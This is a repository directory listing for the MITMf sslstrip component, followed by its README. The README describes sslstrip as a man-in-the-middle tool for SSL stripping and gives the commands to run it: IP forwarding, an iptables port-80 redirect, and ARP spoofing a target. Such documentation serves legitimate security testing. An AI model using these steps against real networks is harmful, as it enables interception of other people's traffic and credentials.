MITMf/core/sslstrip
byt3bl33d3r fd9b79c617 first pass at refactoring:
directory structure has been simplified by grouping all the poisoners and servers in one folder
impacket smb server has been replaced with responder's
flask http server has beem replaced with responder's
modified config file to support new changes
2015-08-02 21:15:10 +02:00
..
__init__.py Version bump 2015-03-30 18:04:24 +02:00
ClientRequest.py first pass at refactoring: 2015-08-02 21:15:10 +02:00
CookieCleaner.py Version bump 2015-03-30 18:04:24 +02:00
COPYING.sslstrip Version bump 2015-03-30 18:04:24 +02:00
DnsCache.py This is a vewwwy big commit 2015-07-18 20:14:07 +02:00
README.md Version bump 2015-03-30 18:04:24 +02:00
ServerConnection.py first pass at refactoring: 2015-08-02 21:15:10 +02:00
ServerConnectionFactory.py This is a vewwwy big commit 2015-07-18 20:14:07 +02:00
SSLServerConnection.py This is a vewwwy big commit 2015-07-18 20:14:07 +02:00
StrippingProxy.py Version bump 2015-03-30 18:04:24 +02:00
URLMonitor.py This commit adds active packet filtering/modification to the framework (replicates etterfilter functionality) 2015-07-27 20:44:23 +02:00

sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks.

It requires Python 2.5 or newer, along with the 'twisted' python module.

Installing: * Unpack: tar zxvf sslstrip-0.5.tar.gz * Install twisted: sudo apt-get install python-twisted-web * (Optionally) run 'python setup.py install' as root to install, or you can just run it out of the directory.

Running: sslstrip can be run from the source base without installation.
Just run 'python sslstrip.py -h' as a non-root user to get the command-line options.

The four steps to getting this working (assuming you're running Linux) 
are:

1) Flip your machine into forwarding mode (as root):
   echo "1" > /proc/sys/net/ipv4/ip_forward

2) Setup iptables to intercept HTTP requests (as root):
   iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>

3) Run sslstrip with the command-line options you'd like (see above).

4) Run arpspoof to redirect traffic to your machine (as root):
   arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>

More Info: http://www.thoughtcrime.org/software/sslstrip/